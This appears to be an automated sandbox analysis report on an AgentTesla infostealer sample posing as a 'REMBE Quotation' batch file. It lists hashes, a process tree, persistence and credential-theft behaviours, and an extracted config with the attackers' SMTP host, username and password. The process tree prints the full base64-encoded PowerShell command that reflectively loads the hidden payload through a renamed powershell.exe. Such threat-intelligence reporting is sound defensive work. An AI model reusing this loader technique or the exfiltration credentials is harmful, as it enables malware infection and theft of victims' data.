Analysis
-
max time kernel
436s -
max time network
450s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2024, 08:38
Static task
static1
Behavioral task
behavioral1
Sample
REMBE Quotation 22001625_REV001.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
REMBE Quotation 22001625_REV001.bat
Resource
win10v2004-20240226-en
General
-
Target
REMBE Quotation 22001625_REV001.bat
-
Size
1014KB
-
MD5
016848cfcf08f2c749ac2b48a0641415
-
SHA1
edcc4626a3f0929f41076ce309e6790281354921
-
SHA256
d0efe415b7966e7ef93071dbc3984cc8911cb9dbe1427dfad480a2cb4b4044ec
-
SHA512
d97b6f1e2ed9ad7ed3477655df88921a90a7658bd686daae1ef83cda818d6efbb6d103bb28e5ff9708e0492e6ca3589449d16652e88fc2445c9159e6356ae099
-
SSDEEP
24576:u+vAwBHSQSaGYvYQDXUAkZXCTsZyNPdOSK1WGfxsrHz:u16yXxQrUAenkOSK11+rHz
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.asiaparadisehotel.com - Port:
587 - Username:
[email protected] - Password:
^b2ycDldex$@ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Executes dropped EXE 1 IoCs
pid Process 3676 Hvanj.png -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TlKsFB = "C:\\Users\\Admin\\AppData\\Roaming\\TlKsFB\\TlKsFB.exe" Hvanj.png -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 api.ipify.org 55 api.ipify.org -
Program crash 1 IoCs
pid pid_target Process procid_target 3324 3676 WerFault.exe 100 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3676 Hvanj.png 3676 Hvanj.png 3676 Hvanj.png 3676 Hvanj.png 3676 Hvanj.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3676 Hvanj.png Token: SeDebugPrivilege 3676 Hvanj.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3756 wrote to memory of 4424 3756 cmd.exe 91 PID 3756 wrote to memory of 4424 3756 cmd.exe 91 PID 3756 wrote to memory of 2448 3756 cmd.exe 92 PID 3756 wrote to memory of 2448 3756 cmd.exe 92 PID 3756 wrote to memory of 3528 3756 cmd.exe 94 PID 3756 wrote to memory of 3528 3756 cmd.exe 94 PID 3528 wrote to memory of 2472 3528 cmd.exe 96 PID 3528 wrote to memory of 2472 3528 cmd.exe 96 PID 3528 wrote to memory of 1160 3528 cmd.exe 97 PID 3528 wrote to memory of 1160 3528 cmd.exe 97 PID 3528 wrote to memory of 4952 3528 cmd.exe 98 PID 3528 wrote to memory of 4952 3528 cmd.exe 98 PID 3528 wrote to memory of 540 3528 cmd.exe 99 PID 3528 wrote to memory of 540 3528 cmd.exe 99 PID 3528 wrote to memory of 3676 3528 cmd.exe 100 PID 3528 wrote to memory of 3676 3528 cmd.exe 100 PID 3528 wrote to memory of 3676 3528 cmd.exe 100
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\REMBE Quotation 22001625_REV001.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:4424
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Hvanj.png2⤵PID:2448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\REMBE Quotation 22001625_REV001.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2472
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Hvanj.png3⤵PID:1160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:4952
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\REMBE Quotation 22001625_REV001.bat" C:\Users\Admin\AppData\Local\Temp\Hvanj.png.bat3⤵PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\Hvanj.pngC:\Users\Admin\AppData\Local\Temp\Hvanj.png -win 1 -enc JABUAGIAcwBsAHIAaQB1AHYAZABoACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAEIAZABuAHcAZQB3AGkAZQB2AG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVABiAHMAbAByAGkAdQB2AGQAaAApADsAJABRAHoAegBnAHQAZwB4AGEAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAQgBkAG4AdwBlAHcAaQBlAHYAbgAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABRAGMAbwB4AHQAbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABRAHoAegBnAHQAZwB4AGEAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUQBjAG8AeAB0AG8ALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFEAYwBvAHgAdABvAC4AQwBsAG8AcwBlACgAKQA7ACQAUQB6AHoAZwB0AGcAeABhAGMALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABCAGQAbgB3AGUAdwBpAGUAdgBuACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEIAZABuAHcAZQB3AGkAZQB2AG4AKQA7ACAAJABPAGYAbQBmAGUAZwBtAG4AawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABCAGQAbgB3AGUAdwBpAGUAdgBuACkAOwAgACQAVwBjAG4AbQBoAGUAbgBpAGgAawBqACAAPQAgACQATwBmAG0AZgBlAGcAbQBuAGsALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABDAGgAaQBiAHoAaQB4ACAAPQAgACQAVwBjAG4AbQBoAGUAbgBpAGgAawBqAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 31804⤵
- Program crash
PID:3324
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3676 -ip 36761⤵PID:5008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
1014KB
MD5016848cfcf08f2c749ac2b48a0641415
SHA1edcc4626a3f0929f41076ce309e6790281354921
SHA256d0efe415b7966e7ef93071dbc3984cc8911cb9dbe1427dfad480a2cb4b4044ec
SHA512d97b6f1e2ed9ad7ed3477655df88921a90a7658bd686daae1ef83cda818d6efbb6d103bb28e5ff9708e0492e6ca3589449d16652e88fc2445c9159e6356ae099
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82